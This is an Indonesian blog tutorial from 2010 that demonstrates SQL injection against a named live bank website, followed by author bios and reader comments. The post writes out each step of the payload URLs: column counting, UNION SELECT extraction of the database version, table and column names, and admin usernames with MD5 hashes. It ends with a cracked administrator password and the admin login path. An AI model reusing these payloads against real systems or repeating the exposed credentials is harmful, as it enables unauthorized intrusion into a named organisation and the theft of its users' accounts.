Tutorial SQL injection Rahman Surya Praja Kamis, 27 Mei 2010 4 Comments

Victim: http://www.bprdinamika.co.id
Vuln : http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1
Tambah single quote (') setelah angka 1
URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1'

Hasilnya:
Fatal error: Call to a member function FetchNextObject() on a non-object in /home/bprdin01/public_html/parts/main/produk_detail.php on line 7

Ternyata ada BUG dan saya coba inject!!

setelah dapet pesan Error tambah perintah ( order by ) untuk mencari column
jika ERROR nya sama kaya yang di atas maka itu yang kita inject!!
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 1--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 2--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 3--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 4--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 5--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 6--

Ternyata ada pesan ERROR, ketika di masukan Order by 6-- Kalo tidak ada pesan ERROR , gosok terus, sampe ada pesan ERROR
Berarti kita inject pas “order by 5--”, karena pas "order by 6--" Terdapat pesan ERROR!!
Kemudian kita lakukan perintah "UNION SELECT" di akhiri urutan Column dari pertama sampai yang akhir
Dan jangan lupa tambahkan tanda (-) di awal angka parameter tersebut
URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1+UNION+SELECT+1,2,3,4,5--
Nanti disana akan muncul angka…ternyata yang muncul adalah angka 2 , jadi masukan perintah
@@version / version() ,untuk mengetahui versi database mysql si korban

URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1+UNION+SELECT+1,@@version,3,4,5--

Hasilnya:
5.0.90-community-log (dan ini yang akan muncul)
Setelah mengetahui versi dari sql Database tersebut, dilanjutkan dengan mengetahui isi table
--> group_concat(table_name) <-- di tempat hasil versi sql nya --> +from+information_schema.tables+where+table_schema =database()-- <-- di simpan di angka terakhir http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- dan hasilnya agenda,arus,aruskap,bulan,fieldlapo,galeri,kap,kappub,komkon,komkonkap,komkonpub,link,lr,lrkap,
lrpub,neraca,neracakap,neracapub,news,produk,strogdetail,strogmain,strogposisi,sukubunga,user,
validasi_kap 

Ada table “user “ kita coba inject table "user" untuk melihat columnnya dengan perintah group_concat(column_name) <-- di tempat hasil versi sql nya atau angka 2 tadi Dan --> +from+information_schema.columns+where+table_name=0xhexa-- <-- perintah ini di simpan setelah angka terakhir 0xhexa artinya masukan hexadecimal;(wajib convert ke hexa agar bisa di baca oleh sql), disana kita akan mengintip 'user' maka di convert menjadi 75736572 di tambah 0x di depannya jadi 0x75736572, untuk convertnya bisa menggunakan bantuan di http://www.swingnote.com/tools/texttohex.php

URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x75736572

Hasilnya:
user_id,login,password,last_ip,last_access,login_counter , inject truz sampe dapet login user/admin , kita hanya butuh 'login, password' jadi perintah injectnya --> grup_concat(login,0x3a,password) <-- 0x3a kalo di decode jadi (:) untuk memisahkan antara login dan password kemudian di akhir masukan column tadi yaitu column 'user' --> +from+user-- <-

URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(login,0x3a,password),3,4,5 from user--
user loginnya namanya 'meilyaanied' dan 'bayu'
tapi passwordnya masih berbentuk MD5 belum di crack , crack dulu yach...
f7b79725ce921bfe0b396485b9a0f08b : 1905197927101977 (cracked)
a0a1d0c5f77a7f9e802903b9f8854768 : False (Not cracked)
sekarang cari dech halaman adminnya ...zzZZZZzz.
http://www.bprdinamika.co.id/admin (tinggal masuk..dech!!)
username : meilyaanied
password : 1905197927101977

Jangan Lupa ingetin si Om adminnya !! ^^
Semoga bermanfaat tutor seorang lamer yang haus akan ilmu pengetahuan !!
by Jillur Rahman

Jillur Rahman is a Web designers. He enjoys to make blogger templates. He always try to make modern and 3D looking Templates. You can by his templates from Themeforest.

Follow him @ Twitter | Facebook | Google Plus

by Rahman Surya Praja

Freelance Forever

Follow him @ Twitter | Facebook | Google Plus

4 komentar :

  1. Congratulations!! Good job ...

    BalasHapus
  2. Kunjungan perdana KataM, wkkwkw
    ane abis googling nyasar di blog omz..

    BalasHapus
  3. wew om katam... nyasar ke tempat ucup!!!! hihihi... mksh dah nanpir!!! lagi belajar ngeblog... :)

    BalasHapus

Terima Kasih Sudah berkunjung!! Di Mohon Untuk Meninggalkan Komen, untuk mempererat silaturahmi.... ^_^